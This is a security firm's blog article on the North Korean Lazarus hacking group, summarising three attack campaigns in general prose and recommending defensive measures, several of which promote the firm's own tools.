How to guard against security attacks from North Korean hackers?

Written by: MetaTrust Labs

On January 1, 2024, a hacker attack on Orbit Chain attracted global attention in the cryptocurrency community. It was reported that hackers exploited vulnerabilities in Orbit Chain to steal $81.5 million worth of cryptocurrency and transferred it to other addresses. Orbit Chain officials have confirmed the incident and stated that they are cooperating with international law enforcement agencies to track the identity and motives of the attackers. Some security experts believe that the tactics and targets of this attack are similar to the style of Lazarus, a North Korean hacker organization, and may be another cybercrime by the organization.

Who is the Lazarus organization, and why does their activity raise such high alert internationally? How do they use cryptocurrency to bypass international sanctions and anti-money laundering measures?

Lazarus, a North Korean Hacker Organization

The Lazarus hacker organization is a well-known group with official ties to North Korea and has been operating for over a decade since 2009. The organization is known for targeting organizations globally, with actions including attacks on financial institutions, media, and government agencies. The Lazarus Group is controlled by the 121st Bureau under the North Korean Reconnaissance General Bureau. The organization is notorious for attacking banks and cryptocurrency exchanges to gain economic benefits by stealing funds and data. The Lazarus Group treats programmers with high regard and encourages individuals with computer talent to join their official "hacker" ranks.

The Pyongyang Automation University is one of the important sources of Lazarus Group hackers. The organization has shifted its focus from political attacks to economic attacks, with a specific focus on the cryptocurrency world. Their activities also involve targeting security researchers, embedding malicious code in open-source cryptocurrency platforms, executing large-scale cryptocurrency robberies, and spreading malware through fake job interviews. The funds obtained by these hacker organizations through illegal means often go through typical money laundering processes used by traditional cybercrime groups, with stolen cryptocurrency frequently converted into fiat currency to evade anti-money laundering measures.

South Korea, the United States, and Japan have maintained a high level of vigilance against North Korean hacker organizations. It has been reported that North Korean hacker organizations have successfully stolen $3 billion worth of cryptocurrency funds in the past few years, which have been used to support North Korea's nuclear and ballistic missile programs. Security advisors from the United States, South Korea, and Japan met in Seoul to discuss how to address the risks posed by North Korea in cyberspace and announced a new trilateral cooperation initiative focusing on North Korea's cybercrime and cryptocurrency money laundering activities. The meeting took place at a time of heightened tension on the Korean Peninsula, as North Korea accelerated the expansion of its nuclear weapons and missile programs and openly displayed its willingness to use nuclear weapons preemptively.

The tactics and targets of the Lazarus hacker organization are diverse, ranging from attacks on the SWIFT network of financial institutions to broader cryptocurrency robberies, demonstrating the organization's high technical capabilities and threats. However, there are relatively few measures in place to prevent these attacks. Since 2018, North Korean hackers have stolen approximately $2 billion in virtual currency. In 2023 alone, they stole about $200 million in cryptocurrency, accounting for 20% of the funds stolen that year. The presence of these hackers poses a continuous threat to the cryptocurrency ecosystem, and their methods of cyber attacks are becoming increasingly sophisticated and complex.

The scale of activity of North Korean hacker organizations exceeds that of other malicious actors by 10 times, and they also target decentralized financial ecosystems. They use various methods for cyber attacks, including phishing, supply chain attacks, and other forms of hacking. Therefore, both businesses and individual users need to strengthen their network security measures, regularly update software, strengthen password policies, and increase their focus on network security. At the same time, regulatory agencies need to strengthen supervision and establish stricter laws and regulations to curb this type of cybercrime.

Attack Case 1: Lazarus exploits the Log4Shell vulnerability for the Blacksmith operation

Attack process and methods:

1. Exploiting the Log4Shell vulnerability: Lazarus first exploits the Log4Shell vulnerability, a remote code execution flaw discovered in the Log4j logging library. Since this vulnerability was discovered and patched two years ago, many systems may still have unpatched versions, providing Lazarus with an entry point.

2. Deployment of proxy tools: Once initial access is obtained, Lazarus sets up a proxy tool for persistent access on the compromised server. This tool allows them to run reconnaissance commands, create new administrator accounts, and deploy other credential-stealing tools.

3. Deployment of NineRAT: In the second stage, Lazarus deploys the NineRAT malware on the system. NineRAT is a remote access Trojan that can collect system information, upgrade to new versions, stop execution, self-uninstall, and upload files from the infected computer. It also includes a dropper responsible for establishing persistence and launching the main binary.

4. Use of DLRAT and BottomLoader: Lazarus also uses DLRAT and BottomLoader. DLRAT is a Trojan and downloader that allows Lazarus to introduce additional payloads on the infected system. BottomLoader is a malware downloader that can retrieve and execute payloads from hardcoded URLs.

5. Credential theft and persistence: Using tools such as ProcDump and MimiKatz for credential dumping to obtain more system information. Meanwhile, persistence of new versions or their removal of payloads is achieved by creating URL files in the system's startup directory.

Reference links:

https://www.csoonline.com/article/1259949/lazarus-apt-attack-campaign-shows-log4shell-exploitation-remains-popular.html

https://nvd.nist.gov/vuln/detail/cve-2021-44228

Attack Case 2: Lazarus hacker organization uses MagicLine4NX software for supply chain attacks

Attack process:

1. Watering hole attack: The Lazarus hacker organization infiltrates websites frequently visited by specific users and embeds malicious scripts. When users of the MagicLine4NX authentication software access these websites, the embedded code executes, allowing the hackers to fully control the system.

2. Exploiting system vulnerabilities to spread malicious code: Hackers exploit zero-day vulnerabilities in the MagicLine4NX software, enabling personal computers connected to the network to access their internet servers. They then propagate the malicious code to business-side servers through the data synchronization feature.

3. Attempted data transfer: The malware attempts to establish connections with two C2 servers, one inside the network system's gateway and the other outside the internet. If successful, a large amount of internal network information may be leaked.

Technical means:

1. Zero-day vulnerability exploitation: Hackers exploit zero-day vulnerabilities in the MagicLine4NX software, which are vulnerabilities that have not yet been publicly disclosed, allowing them unauthorized access to the target system.

2. Supply chain attack: By exploiting vulnerabilities in the supply chain, hackers can bypass normal security measures and directly attack the target system.

3. Data synchronization and connection to C2 servers: Hackers use the data synchronization feature to spread malicious code to business-side servers and attempt to establish a connection with external C2 servers for further control and data theft.

Reference links:

https://www.zerofox.com/advisories/22471/

https://nvd.nist.gov/vuln/detail/CVE-2023-45797

Attack Case 3: Attacks on Cryptocurrency

Target: Cryptocurrency exchanges, wallets, decentralized finance (DeFi) ecosystems

Attack Time: Since 2018, especially in 2023

Attack Process and Techniques:

1. Exploiting vulnerabilities and leaked private keys: North Korean hackers use phishing and supply chain attacks with leaked private keys or seed phrases to invade targets.

2. Cross-chain attacks: They specifically target cross-chain bridges, such as the Axie Infinity Ronin Bridge, to steal large amounts of virtual currency.

Multi-stage money laundering process: North Korean hackers have used complex "multi-stage money laundering processes" in the past to obscure the source and destination of funds. They convert stolen virtual currency into different tokens, then mix and exchange them multiple times through automated programs, mixers, and cross-chain exchanges to increase the difficulty of tracking.

3. Using decentralized exchanges: They convert stolen virtual currency into Ether through decentralized exchanges, then mix and exchange multiple times.

In summary, attackers can steal sensitive data, including confidential business information, customer data, and personal identity information, leading to privacy breaches and potential legal consequences. Due to the hackers' complete control over the target system, they may gain access to a large amount of sensitive information, including internal data and customer records. Lazarus's hacker actions not only lead to data leaks and system damage for the affected organizations but may also have a significant impact on their business operations.

These attacks often involve complex supply chain attacks, making prevention and detection more difficult. Attacks may result in financial losses, including the cost of malware removal, data recovery, system repairs, and income loss due to business interruptions. Hacker attacks have led to the theft of a large amount of virtual currency, causing economic losses for victims and potentially exposing their personal information and transaction data. Attacks on cross-chain bridges may lead to the paralysis of entire systems, affecting the normal conduct of transactions.

To address such security threats, organizations are advised to take the following preventive measures:

1. Timely patching of vulnerabilities: Ensure timely application of security patches to fix known vulnerabilities. Especially for software and components used in the supply chain, automated auditing with MetaScan can help identify and patch potential vulnerabilities in a timely manner.

2. Strengthen supply chain security: Establish secure partnerships with supply chain partners, review and verify software and components to ensure that all links in the supply chain are not vulnerable to hacker attacks. Dynamic updating of blacklists with MetaScout's monitoring feature can block attacks from potential North Korean hacker addresses.

3. Security awareness training: Strengthen employees' security awareness training. Educate employees about the importance of being vigilant against watering hole attacks, malicious scripts, and supply chain security to reduce the impact of human factors on security. Scantist's DevSecOps solution can provide organizations with comprehensive security training and guidance.

4. Network traffic monitoring: Implement network traffic monitoring and intrusion detection systems (IDS/IPS) to promptly detect abnormal activities and attack behaviors. MetaScout's attack blocking mechanism can identify and block hacker attack transactions in a timely manner, combined with network traffic monitoring.

5. Multi-layer defense: Use multiple defense measures, including firewalls, intrusion detection systems, antivirus software, etc., to enhance system security. MetaScan's Prover feature can be used in conjunction with existing security tools and measures to form a more comprehensive defense system.

6. Continuous monitoring and response: Establish a security monitoring and response mechanism to detect abnormal behavior in real-time and take appropriate response measures to minimize the impact of attacks. Scantist's component analysis feature can continuously monitor vulnerabilities in the software supply chain and intercept problematic open-source and third-party components in a timely manner.

7. Strengthen security measures for cryptocurrency exchanges and wallets: Cryptocurrency exchanges and wallets should strengthen their security measures, such as using strong passwords, regularly changing private keys, implementing multi-layer security policies, etc. MetaScout's blocking mechanism can provide attack blocking protection based on dynamic blacklists for cryptocurrency exchanges, ensuring the security of users' digital assets.

8. Regular audits and checks: Organizations should conduct regular security audits and checks to ensure there are no potential security vulnerabilities. MetaScan's automated auditing feature can help organizations conduct comprehensive security assessments and promptly identify potential vulnerabilities and risks.

9. Raise public awareness: Educate the public about the importance of cybersecurity and how to protect their digital assets. Organizations can raise public awareness of cybersecurity through promotional activities, social media, and provide relevant security advice and guidance.

It should be noted that security threats and prevention recommendations should be evaluated and customized based on actual circumstances and the latest security intelligence. In addition, regular data backup and recovery, the use of strong passwords and multi-factor authentication, and limiting privileged access are also effective measures to enhance security.

免责声明：本文章仅代表作者个人观点，不代表本平台的立场和观点。本文章仅供信息分享，不构成对任何人的任何投资建议。用户与作者之间的任何争议，与本平台无关。如网页中刊载的文章或图片涉及侵权，请提供相关的权利证明和身份证明发送邮件到support@aicoin.com，本平台相关工作人员将会进行核查。